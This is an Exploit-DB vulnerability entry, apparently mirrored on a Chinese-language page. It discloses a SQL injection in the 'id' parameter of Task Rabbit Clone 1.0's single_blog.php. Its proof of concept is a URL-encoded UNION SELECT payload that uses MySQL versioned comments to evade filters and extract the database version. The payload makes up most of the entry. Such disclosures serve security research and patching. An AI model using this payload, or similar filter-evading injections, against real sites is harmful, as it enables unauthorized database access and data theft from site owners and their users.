Task Rabbit Clone 1.0 – ‘id’ SQL Injection

  • 作者: Ihsan Sencan
    日期: 2018-01-28
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/43914/
  • # # # # # 
    # Exploit Title: Task Rabbit Clone 1.0 - SQL Injection
    # Dork: N/A
    # Date: 27.01.2018
    # Vendor Homepage: http://migrateshop.com/
    # Software Link: http://migrateshop.com/product/task-rabbit-clone-php-script/
    # Version: 1.0
    # Category: Webapps
    # Tested on: WiN7_x64/KaLiLinuX_x64
    # CVE: N/A
    # # # # #
    # Exploit Author: Ihsan Sencan
    # Author Web: http://ihsan.net
    # Author Social: @ihsansencan
    # # # # #
    # Description:
    # The vulnerability allows an attacker to inject sql commands....
    # 
    # Proof of Concept: 
    # 
    # http://localhost/[PATH]/pages/single_blog.php?id=[SQL]
    # 
    # %31%20%20%2f%2a%21%31%33%33%33%37%55%4e%49%4f%4e%2a%2f%20%2f%2a%21%31%33%33%33%37%53%45%4c%45%43%54%2a%2f%20%31%2c%76%65%72%73%69%6f%6e%28%29%2c%33%2c%34%2c%35%2c%36%2d%2d%20%2d
    # 
    # # # # #